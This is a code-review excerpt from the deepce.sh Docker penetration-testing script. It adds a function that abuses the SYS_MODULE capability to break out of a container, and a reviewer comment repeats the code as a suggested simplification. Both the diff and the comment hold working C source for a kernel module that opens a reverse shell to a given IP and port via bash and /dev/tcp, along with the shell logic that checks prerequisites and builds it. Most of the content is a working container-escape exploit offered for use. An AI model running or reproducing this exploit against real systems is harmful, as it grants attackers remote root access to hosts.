deepce.sh

```diff
@@ -1112,6 +1115,112 @@ exploitDockerSock() {
   # TODO: Tidy up command
 }
 
+exploitSysModule(){
+  printSection "Exploiting SYS_MODULE"
+  printTip "$TIP_SYS_MODULE"
+
+  if ! [ -x "$(command -v capsh)" ]; then
+    printError "capsh is required to run this exploit."
+    exit 1
+  fi
+
+  if ! [ -x "$(command -v make)" ]; then
+    printError "make is required to run this exploit."
+    exit 1
+  fi
+
+  if ! [ -x "$(command -v insmod)" ]; then
+    printError "insmod is required to run this exploit."
+    exit 1
+  fi
+
+  if ! [ -d "/lib/modules/$(uname -r)" ]; then
+    printError "Linux headers for $(uname -r) are required to run this exploit."
+    exit 1
+  fi
+
+  caps=$(capsh --print)
+  if ! [ $caps =~ "cap_sys_module" ]; then
+    printError "We don't have the SYS_MODULE capability, which is required for this exploit"
+    exit 1
+  fi
+
+  if [ -z "$ip" ]; then
+    printError "Missing reverse shell IP : use --ip"
+    exit 1
+  fi
+
+  if [ -z "$port" ]; then
+    printError "Missing reverse shell port : use --port"
+    exit 1
+  fi
+  
+  module_name=$(shuf -zer -n10 {a..z} {A..Z}| tr -d '\0')
+  sys_cwd=$(pwd)
+
+  mkdir /dev/shm/rev && cd /dev/shm/rev
+
+  printQuestion "Writing scripts..."
+
+  # POC modified from https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
+  C_SRC=$(cat << EOF
+#include <linux/kmod.h>
+#include <linux/module.h>
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("AttackDefense");
+MODULE_DESCRIPTION("LKM reverse shell module");
+MODULE_VERSION("1.0");
+char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL};
+static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
+static int __init ${module_name}_init(void) {
+return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
+}
+static void __exit ${module_name}_exit(void) {
+}
+module_init(${module_name}_init);
+module_exit(${module_name}_exit);
+EOF
+  )
+
+  echo "$C_SRC" > "$module_name.c"
```

Comment:
```suggestion
cat << EOF > $module_name.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init ${module_name}_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit ${module_name}_exit(void) {
}
module_init(${module_name}_init);
module_exit(${module_name}_exit);
EOF
```

I think this can be simplified a bit further now we're not using sed